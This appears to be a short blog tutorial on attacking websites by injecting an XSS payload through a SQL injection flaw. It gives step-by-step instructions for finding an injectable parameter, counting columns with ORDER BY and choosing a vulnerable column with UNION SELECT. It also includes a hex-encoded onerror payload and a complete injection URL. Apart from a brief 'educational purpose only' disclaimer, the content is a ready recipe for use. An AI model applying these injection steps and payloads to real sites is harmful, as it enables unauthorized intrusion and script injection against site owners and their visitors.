Today I am going to tell you that how to attack a website using XSS (Cross-Site-Scripting + SQLi).
This is pretty simple! We just have to inject our JavaScript code in the website. I will not teach you the basics of SQLi.
Let’s start:
Step 1:
First we have to find a SQLi vul. Site.
First we have to find a SQLi vul. Site.
Like this:
http://www.site.in/index.php?id=3
Step 2:
Finding the number of columns on the site using ORDER BY method.
~ Suppose our site have 9 columns!Step 3:
Finding the Vulnerable column using UNION ALL SELECT methods.
~ And the most vul. column is 3!Step 4:
Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.
Our XSS injection Payload:-
<img src=x onerror=confirm(/XSS/)>Our Hex Encoded Payload:-
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293eStep 5:
Injecting The Payload Into The Site!
Like this:-
http://site.com/index.php?id=-3′ union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5,6,7,8,9–+
Note: “This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing. ”
0 comments:
Post a Comment